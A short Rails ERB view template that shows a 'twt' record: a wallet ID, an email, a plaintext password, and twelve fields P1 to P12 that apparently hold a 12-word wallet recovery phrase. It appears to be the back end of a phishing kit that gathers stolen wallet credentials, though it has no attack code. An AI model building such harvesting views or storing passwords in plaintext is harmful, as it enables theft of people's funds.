<p id="notice"><%= notice %></p>

<p>
  <strong>Wallet:</strong>
  <%= @twt.wallet_id %>
</p>

<p>
  <strong>Email:</strong>
  <%= @twt.email %>
</p>

<p>
  <strong>Password:</strong>
  <%= @twt.password %>
</p>

<p>
  <strong>P1:</strong>
  <%= @twt.p1 %>
</p>

<p>
  <strong>P2:</strong>
  <%= @twt.p2 %>
</p>

<p>
  <strong>P3:</strong>
  <%= @twt.p3 %>
</p>

<p>
  <strong>P4:</strong>
  <%= @twt.p4 %>
</p>

<p>
  <strong>P5:</strong>
  <%= @twt.p5 %>
</p>

<p>
  <strong>P6:</strong>
  <%= @twt.p6 %>
</p>

<p>
  <strong>P7:</strong>
  <%= @twt.p7 %>
</p>

<p>
  <strong>P8:</strong>
  <%= @twt.p8 %>
</p>

<p>
  <strong>P9:</strong>
  <%= @twt.p9 %>
</p>

<p>
  <strong>P10:</strong>
  <%= @twt.p10 %>
</p>

<p>
  <strong>P11:</strong>
  <%= @twt.p11 %>
</p>

<p>
  <strong>P12:</strong>
  <%= @twt.p12 %>
</p>

<%= link_to 'Edit', edit_twt_path(@twt) %> |
<%= link_to 'Back', twts_path %>
